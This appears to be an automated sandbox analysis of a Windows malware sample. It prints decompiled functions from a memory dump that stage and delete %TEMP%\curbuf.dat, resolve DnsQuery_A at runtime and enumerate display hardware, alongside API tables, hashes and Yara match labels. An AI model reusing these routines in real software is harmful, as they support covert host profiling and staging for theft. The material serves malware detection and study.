							_t81 = _t54;
							if(_t54 != 0) {
								E004062D8(L"%TEMP%\\curbuf.dat",  &_v24, _t81);
								E00407168(_v24, _t59,  &_v16);
							}
						}
						E0040DCE8(_v16, _t59, _v12, _t73, _t74);
						E004062D8(L"%TEMP%\\curbuf.dat",  &_v28, _t81);
						DeleteFileW(E00403D3C(_v28));
					}
				}
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(E0040DEB6);
				E00403B98( &_v28, 3);
				E00403508( &_v16, 2);
				return E00403B80( &_v8);
			}





















                                                                                                                                                                                          0x0040ddb0
                                                                                                                                                                                          0x0040ddb0
                                                                                                                                                                                          0x0040ddb0
                                                                                                                                                                                          0x0040ddb0
                                                                                                                                                                                          0x0040ddb5
                                                                                                                                                                                          0x0040ddb6
                                                                                                                                                                                          0x0040ddb7
                                                                                                                                                                                          0x0040ddb8
                                                                                                                                                                                          0x0040ddb9
                                                                                                                                                                                          0x0040ddba
                                                                                                                                                                                          0x0040ddbb
                                                                                                                                                                                          0x0040ddbe
                                                                                                                                                                                          0x0040ddc4
                                                                                                                                                                                          0x0040ddcc
                                                                                                                                                                                          0x0040ddd3
                                                                                                                                                                                          0x0040ddd4
                                                                                                                                                                                          0x0040ddd9
                                                                                                                                                                                          0x0040dddc
                                                                                                                                                                                          0x0040dde2
                                                                                                                                                                                          0x0040dde7
                                                                                                                                                                                          0x0040dde8
                                                                                                                                                                                          0x0040ddee
                                                                                                                                                                                          0x0040ddfe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040ddf0
                                                                                                                                                                                          0x0040ddf0
                                                                                                                                                                                          0x0040ddf6
                                                                                                                                                                                          0x0040de00
                                                                                                                                                                                          0x0040de06
                                                                                                                                                                                          0x0040de0e
                                                                                                                                                                                          0x0040de13
                                                                                                                                                                                          0x0040de15
                                                                                                                                                                                          0x0040de19
                                                                                                                                                                                          0x0040de21
                                                                                                                                                                                          0x0040de26
                                                                                                                                                                                          0x0040de29
                                                                                                                                                                                          0x0040de38
                                                                                                                                                                                          0x0040de3d
                                                                                                                                                                                          0x0040de3f
                                                                                                                                                                                          0x0040de49
                                                                                                                                                                                          0x0040de54
                                                                                                                                                                                          0x0040de54
                                                                                                                                                                                          0x0040de3f
                                                                                                                                                                                          0x0040de5f
                                                                                                                                                                                          0x0040de6c
                                                                                                                                                                                          0x0040de7a
                                                                                                                                                                                          0x0040de7a
                                                                                                                                                                                          0x0040ddf6
                                                                                                                                                                                          0x0040de81
                                                                                                                                                                                          0x0040de84
                                                                                                                                                                                          0x0040de87
                                                                                                                                                                                          0x0040de94
                                                                                                                                                                                          0x0040dea1
                                                                                                                                                                                          0x0040deae

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C), ref: 0040DE38
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C,00000001,?), ref: 0040DE7A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AllocCopyDeleteString
                                                                                                                                                                                          • String ID: %TEMP%\curbuf.dat$LLA
                                                                                                                                                                                          • API String ID: 5292005-3909751444
                                                                                                                                                                                          • Opcode ID: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
                                                                                                                                                                                          • Instruction ID: d3139e3bb668dcd489f787ebceafddff3eb8ed9e6fe86914fc70b8a9fa006da4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E21FC74D10509ABDB00FBE5C88299EB7B9AF54305F50857BF400B72D2D738AE058A99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00417E78, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 36%
                                                                                                                                                                                          			E00417E78(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v117;
				void* _t16;
				intOrPtr* _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t49;

				_t16 = __eax +  *__eax;
				 *_t16 =  *_t16 + _t16;
				 *[cs:eax] =  *[cs:eax] + _t16;
				_v117 = _v117 + __edx;
				_v12 = __edx;
				_v8 = _t16;
				E00403980(_v8);
				_push(_t49);
				_push(0x417f22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t49 + 0xfffffff4;
				_t46 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
				if(_t46 != 0) {
					_v16 = 0;
					_t37 = E00402530(0x30);
					_v16 = E00402530(0x48);
					 *_t37 = 1;
					 *((intOrPtr*)(_t37 + 4)) = _v12;
					_push(0);
					_push( &_v16);
					_push(_t37);
					_push(0);
					_push(1);
					_push(E00403990(_v8));
					if( *_t46() == 0) {
					}
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E00417F29);
				return E004034E4( &_v8);
			}












                                                                                                                                                                                          0x00417e78
                                                                                                                                                                                          0x00417e7a
                                                                                                                                                                                          0x00417e7c
                                                                                                                                                                                          0x00417e7f
                                                                                                                                                                                          0x00417e89
                                                                                                                                                                                          0x00417e8c
                                                                                                                                                                                          0x00417e92
                                                                                                                                                                                          0x00417e99
                                                                                                                                                                                          0x00417e9a
                                                                                                                                                                                          0x00417e9f
                                                                                                                                                                                          0x00417ea2
                                                                                                                                                                                          0x00417ebc
                                                                                                                                                                                          0x00417ec0
                                                                                                                                                                                          0x00417ec4
                                                                                                                                                                                          0x00417ed1
                                                                                                                                                                                          0x00417edd
                                                                                                                                                                                          0x00417ee0
                                                                                                                                                                                          0x00417ee9
                                                                                                                                                                                          0x00417eec
                                                                                                                                                                                          0x00417ef1
                                                                                                                                                                                          0x00417ef2
                                                                                                                                                                                          0x00417ef3
                                                                                                                                                                                          0x00417ef5
                                                                                                                                                                                          0x00417eff
                                                                                                                                                                                          0x00417f04
                                                                                                                                                                                          0x00417f04
                                                                                                                                                                                          0x00417f04
                                                                                                                                                                                          0x00417f0e
                                                                                                                                                                                          0x00417f11
                                                                                                                                                                                          0x00417f14
                                                                                                                                                                                          0x00417f21

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                          • String ID: DnsQuery_A$dnsapi.dll
                                                                                                                                                                                          • API String ID: 2574300362-3847274415
                                                                                                                                                                                          • Opcode ID: 724cfed19cb1d21381234b51a37364b79d38ba7da5abfef29c6bd78e431c9a57
                                                                                                                                                                                          • Instruction ID: ee02e28701cd333fe80aa916ff0e932040e536dc5bff3800914b034e455f76c5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 724cfed19cb1d21381234b51a37364b79d38ba7da5abfef29c6bd78e431c9a57
                                                                                                                                                                                          • Instruction Fuzzy Hash: A9115E71A08304AED711DBA9CC52B9EBBB8DB45704F5140A7E504E72D2D6789E018B58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00417E7C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 33%
                                                                                                                                                                                          			E00417E7C(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v117;
				intOrPtr* _t36;
				intOrPtr _t40;
				intOrPtr* _t45;
				void* _t48;

				 *[cs:eax] =  *[cs:eax] + __eax;
				_v117 = _v117 + __edx;
				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				_push(_t48);
				_push(0x417f22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t48 + 0xfffffff4;
				_t45 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
				if(_t45 != 0) {
					_v16 = 0;
					_t36 = E00402530(0x30);
					_v16 = E00402530(0x48);
					 *_t36 = 1;
					 *((intOrPtr*)(_t36 + 4)) = _v12;
					_push(0);
					_push( &_v16);
					_push(_t36);
					_push(0);
					_push(1);
					_push(E00403990(_v8));
					if( *_t45() == 0) {
					}
				}
				_pop(_t40);
				 *[fs:eax] = _t40;
				_push(E00417F29);
				return E004034E4( &_v8);
			}











                                                                                                                                                                                          0x00417e7c
                                                                                                                                                                                          0x00417e7f
                                                                                                                                                                                          0x00417e89
                                                                                                                                                                                          0x00417e8c
                                                                                                                                                                                          0x00417e92
                                                                                                                                                                                          0x00417e99
                                                                                                                                                                                          0x00417e9a
                                                                                                                                                                                          0x00417e9f
                                                                                                                                                                                          0x00417ea2
                                                                                                                                                                                          0x00417ebc
                                                                                                                                                                                          0x00417ec0
                                                                                                                                                                                          0x00417ec4
                                                                                                                                                                                          0x00417ed1
                                                                                                                                                                                          0x00417edd
                                                                                                                                                                                          0x00417ee0
                                                                                                                                                                                          0x00417ee9
                                                                                                                                                                                          0x00417eec
                                                                                                                                                                                          0x00417ef1
                                                                                                                                                                                          0x00417ef2
                                                                                                                                                                                          0x00417ef3
                                                                                                                                                                                          0x00417ef5
                                                                                                                                                                                          0x00417eff
                                                                                                                                                                                          0x00417f04
                                                                                                                                                                                          0x00417f04
                                                                                                                                                                                          0x00417f04
                                                                                                                                                                                          0x00417f0e
                                                                                                                                                                                          0x00417f11
                                                                                                                                                                                          0x00417f14
                                                                                                                                                                                          0x00417f21

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                          • String ID: DnsQuery_A$dnsapi.dll
                                                                                                                                                                                          • API String ID: 2574300362-3847274415
                                                                                                                                                                                          • Opcode ID: 50f0b7069414203643d559ff8c1b4067f618f2f1807c4d8d96e87e961dc54617
                                                                                                                                                                                          • Instruction ID: 3ed38bd560de987a20526e09c97c4f2d359d7c1ce2b9a36b0a47fbdadc566110
                                                                                                                                                                                          • Opcode Fuzzy Hash: 50f0b7069414203643d559ff8c1b4067f618f2f1807c4d8d96e87e961dc54617
                                                                                                                                                                                          • Instruction Fuzzy Hash: 48113D71A08304AEDB11DBA9CD52B9EBBB8DB44714F5140BBF904E73D1D6789E018B58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00416644, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 32%
                                                                                                                                                                                          			E00416644(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				_Unknown_base(*)()* _v8;
				char _v268;
				char _v336;
				char _v340;
				char _v344;
				void* _t31;
				intOrPtr _t39;
				intOrPtr* _t43;
				void* _t46;

				_v340 = 0;
				_v344 = 0;
				_t43 = __eax;
				_push(_t46);
				_push(0x41670d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffeac;
				_v8 = GetProcAddress(LoadLibraryA("user32.dll"), "EnumDisplayDevicesW");
				_v336 = 0x148;
				_t31 = 0;
				while(1) {
					_push(0);
					_push( &_v336);
					_push(_t31);
					_push(0);
					if(_v8() == 0) {
						break;
					}
					_t31 = _t31 + 1;
					_push( *_t43);
					E00403D10( &_v344, 0x80,  &_v268);
					E0040377C( &_v340, _v344);
					_push(_v340);
					_push(E00416744);
					E00403850();
				}
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(E00416714);
				E00403B80( &_v344);
				return E004034E4( &_v340);
			}












                                                                                                                                                                                          0x00416652
                                                                                                                                                                                          0x00416658
                                                                                                                                                                                          0x0041665e
                                                                                                                                                                                          0x00416662
                                                                                                                                                                                          0x00416663
                                                                                                                                                                                          0x00416668
                                                                                                                                                                                          0x0041666b
                                                                                                                                                                                          0x00416683
                                                                                                                                                                                          0x00416686
                                                                                                                                                                                          0x00416692
                                                                                                                                                                                          0x004166d7
                                                                                                                                                                                          0x004166d7
                                                                                                                                                                                          0x004166de
                                                                                                                                                                                          0x004166df
                                                                                                                                                                                          0x004166e0
                                                                                                                                                                                          0x004166e7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00416696
                                                                                                                                                                                          0x00416697
                                                                                                                                                                                          0x004166aa
                                                                                                                                                                                          0x004166bb
                                                                                                                                                                                          0x004166c0
                                                                                                                                                                                          0x004166c6
                                                                                                                                                                                          0x004166d2
                                                                                                                                                                                          0x004166d2
                                                                                                                                                                                          0x004166eb
                                                                                                                                                                                          0x004166ee
                                                                                                                                                                                          0x004166f1
                                                                                                                                                                                          0x004166fc
                                                                                                                                                                                          0x0041670c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(user32.dll,EnumDisplayDevicesW,00000000,0041670D,?,-00000001,0041B0FC,?,?,00416863,Video Info,?,004169AC,?,GetRAM: ,?), ref: 00416678
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0041667E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                          • String ID: EnumDisplayDevicesW$user32.dll
                                                                                                                                                                                          • API String ID: 2574300362-1693391355
                                                                                                                                                                                          • Opcode ID: be31b090cf9e22f53fe63a2b9ccc94bb75e49f076f039a93db071de62ba29d85
                                                                                                                                                                                          • Instruction ID: bffb8a391e8cbf63d1c0eded9315efc20e69fe0ee1e689c0aa8ff6c2638661ea
                                                                                                                                                                                          • Opcode Fuzzy Hash: be31b090cf9e22f53fe63a2b9ccc94bb75e49f076f039a93db071de62ba29d85
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E118970500618AFDB61EF61CC45BDABBBCEF84709F1140FAE508A6291D6789E848E58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00417E80, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 29%
                                                                                                                                                                                          			E00417E80(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t34;
				intOrPtr _t38;
				intOrPtr* _t43;
				void* _t46;

				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				_push(_t46);
				_push(0x417f22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				_t43 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
				if(_t43 != 0) {
					_v16 = 0;
					_t34 = E00402530(0x30);
					_v16 = E00402530(0x48);
					 *_t34 = 1;
					 *((intOrPtr*)(_t34 + 4)) = _v12;
					_push(0);
					_push( &_v16);
					_push(_t34);
					_push(0);
					_push(1);
					_push(E00403990(_v8));
					if( *_t43() == 0) {
					}
				}
				_pop(_t38);
				 *[fs:eax] = _t38;
				_push(E00417F29);
				return E004034E4( &_v8);
			}










                                                                                                                                                                                          0x00417e89
                                                                                                                                                                                          0x00417e8c
                                                                                                                                                                                          0x00417e92
                                                                                                                                                                                          0x00417e99
                                                                                                                                                                                          0x00417e9a
                                                                                                                                                                                          0x00417e9f
                                                                                                                                                                                          0x00417ea2
                                                                                                                                                                                          0x00417ebc
                                                                                                                                                                                          0x00417ec0
                                                                                                                                                                                          0x00417ec4
                                                                                                                                                                                          0x00417ed1
                                                                                                                                                                                          0x00417edd
                                                                                                                                                                                          0x00417ee0
                                                                                                                                                                                          0x00417ee9
                                                                                                                                                                                          0x00417eec
                                                                                                                                                                                          0x00417ef1
                                                                                                                                                                                          0x00417ef2
                                                                                                                                                                                          0x00417ef3
                                                                                                                                                                                          0x00417ef5
                                                                                                                                                                                          0x00417eff
                                                                                                                                                                                          0x00417f04
                                                                                                                                                                                          0x00417f04
                                                                                                                                                                                          0x00417f04
                                                                                                                                                                                          0x00417f0e
                                                                                                                                                                                          0x00417f11
                                                                                                                                                                                          0x00417f14
                                                                                                                                                                                          0x00417f21

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                          • String ID: DnsQuery_A$dnsapi.dll
                                                                                                                                                                                          • API String ID: 2574300362-3847274415
                                                                                                                                                                                          • Opcode ID: a19d4597b475aaa9ac328eaf6b87c7589b0a3e1b2296b7586c6c4fb46158065e
                                                                                                                                                                                          • Instruction ID: 92d1eb556667ed81b8552bf9075b82756b3340621e6324b7cba7be93811987cb
                                                                                                                                                                                          • Opcode Fuzzy Hash: a19d4597b475aaa9ac328eaf6b87c7589b0a3e1b2296b7586c6c4fb46158065e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 20111CB1A04304AED751DBAACD42B9FBBF8EB48714F5140B6F904E73C1E678DE418A58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401870, Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                          			E00401870() {
				signed int _t13;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401926);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x41c5b4);
				L004011C4();
				if( *0x41c035 != 0) {
					_push(0x41c5b4);
					L004011CC();
				}
				E00401234(0x41c5d4);
				E00401234(0x41c5e4);
				E00401234(0x41c610);
				 *0x41c60c = LocalAlloc(0, 0xff8);
				if( *0x41c60c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x41c60c; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x41c5f8)) = 0x41c5f4;
					 *0x41c5f4 = 0x41c5f4;
					 *0x41c600 = 0x41c5f4;
					 *0x41c5ac = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E0040192D);
				if( *0x41c035 != 0) {
					_push(0x41c5b4);
					L004011D4();
					return 0;
				}
				return 0;
			}







                                                                                                                                                                                          0x00401875
                                                                                                                                                                                          0x00401876
                                                                                                                                                                                          0x0040187b
                                                                                                                                                                                          0x0040187e
                                                                                                                                                                                          0x00401881
                                                                                                                                                                                          0x00401886
                                                                                                                                                                                          0x00401892
                                                                                                                                                                                          0x00401894
                                                                                                                                                                                          0x00401899
                                                                                                                                                                                          0x00401899
                                                                                                                                                                                          0x004018a3
                                                                                                                                                                                          0x004018ad
                                                                                                                                                                                          0x004018b7
                                                                                                                                                                                          0x004018c8
                                                                                                                                                                                          0x004018d4
                                                                                                                                                                                          0x004018d6
                                                                                                                                                                                          0x004018db
                                                                                                                                                                                          0x004018db
                                                                                                                                                                                          0x004018e3
                                                                                                                                                                                          0x004018e7
                                                                                                                                                                                          0x004018e8
                                                                                                                                                                                          0x004018f4
                                                                                                                                                                                          0x004018f7
                                                                                                                                                                                          0x004018f9
                                                                                                                                                                                          0x004018fe
                                                                                                                                                                                          0x004018fe
                                                                                                                                                                                          0x00401907
                                                                                                                                                                                          0x0040190a
                                                                                                                                                                                          0x0040190d
                                                                                                                                                                                          0x00401919
                                                                                                                                                                                          0x0040191b
                                                                                                                                                                                          0x00401920
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401920
                                                                                                                                                                                          0x00401925

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 730355536-0
                                                                                                                                                                                          • Opcode ID: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
                                                                                                                                                                                          • Instruction ID: 5328ea8a61f1b3c3886908a4d7eb6976bfaff4b38786c7c23389d9dab3a387f7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
                                                                                                                                                                                          • Instruction Fuzzy Hash: 06015BB0684390AEE719AB6A9C967957F92D749704F05C0BFE100BA6F1CB7D5480CB1E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040246C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                          			E0040246C(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr _t36;
				intOrPtr _t39;
				void* _t42;
				intOrPtr _t45;
				intOrPtr _t47;

				_t45 = _t47;
				_t42 = __edx;
				_t25 = __eax;
				if( *0x41c5ac != 0 || E00401870() != 0) {
					_push(_t45);
					_push("�^");
					_push( *[fs:edx]);
					 *[fs:edx] = _t47;
					if( *0x41c035 != 0) {
						_push(0x41c5b4);
						L004011CC();
					}
					if(E00402290(_t25, _t42) == 0) {
						_t39 = E00401F5C(_t42);
						_t15 = ( *(_t25 - 4) & 0x7ffffffc) - 4;
						if(_t42 < ( *(_t25 - 4) & 0x7ffffffc) - 4) {
							_t15 = _t42;
						}
						if(_t39 != 0) {
							E00402628(_t25, _t15, _t39);
							E004020EC(_t25);
						}
						_v8 = _t39;
					} else {
						_v8 = _t25;
					}
					_pop(_t36);
					 *[fs:eax] = _t36;
					_push(E00402524);
					if( *0x41c035 != 0) {
						_push(0x41c5b4);
						L004011D4();
						return 0;
					}
					return 0;
				} else {
					_v8 = 0;
					return _v8;
				}
			}












                                                                                                                                                                                          0x0040246d
                                                                                                                                                                                          0x00402473
                                                                                                                                                                                          0x00402475
                                                                                                                                                                                          0x0040247e
                                                                                                                                                                                          0x00402495
                                                                                                                                                                                          0x00402496
                                                                                                                                                                                          0x0040249b
                                                                                                                                                                                          0x0040249e
                                                                                                                                                                                          0x004024a8
                                                                                                                                                                                          0x004024aa
                                                                                                                                                                                          0x004024af
                                                                                                                                                                                          0x004024af
                                                                                                                                                                                          0x004024bf
                                                                                                                                                                                          0x004024cd
                                                                                                                                                                                          0x004024db
                                                                                                                                                                                          0x004024e0
                                                                                                                                                                                          0x004024e2
                                                                                                                                                                                          0x004024e2
                                                                                                                                                                                          0x004024e6
                                                                                                                                                                                          0x004024ed
                                                                                                                                                                                          0x004024f4
                                                                                                                                                                                          0x004024f4
                                                                                                                                                                                          0x004024f9
                                                                                                                                                                                          0x004024c1
                                                                                                                                                                                          0x004024c1
                                                                                                                                                                                          0x004024c1
                                                                                                                                                                                          0x004024fe
                                                                                                                                                                                          0x00402501
                                                                                                                                                                                          0x00402504
                                                                                                                                                                                          0x00402510
                                                                                                                                                                                          0x00402512
                                                                                                                                                                                          0x00402517
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402517
                                                                                                                                                                                          0x0040251c
                                                                                                                                                                                          0x00402489
                                                                                                                                                                                          0x0040248b
                                                                                                                                                                                          0x0040252c
                                                                                                                                                                                          0x0040252c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,^), ref: 004024AF
                                                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00402524), ref: 00402517
                                                                                                                                                                                            • Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                                                                                                                                            • Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                                                                                                                                            • Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                                                                                                                                            • Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                                                                                          • String ID: ^
                                                                                                                                                                                          • API String ID: 2227675388-551292248
                                                                                                                                                                                          • Opcode ID: 36f5b8f16900d0e995ce4c5524c526641fb23a44d7305ae2e8247758f3247216
                                                                                                                                                                                          • Instruction ID: 4ed45a5183fb1a6edd108f9af425bfacc088641811e0c18f6da98f6ec62fa594
                                                                                                                                                                                          • Opcode Fuzzy Hash: 36f5b8f16900d0e995ce4c5524c526641fb23a44d7305ae2e8247758f3247216
                                                                                                                                                                                          • Instruction Fuzzy Hash: 92113431700210AEEB25AB7A5F49B5A7BD59786358F20407FF404F32D2D6BD9C00825C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%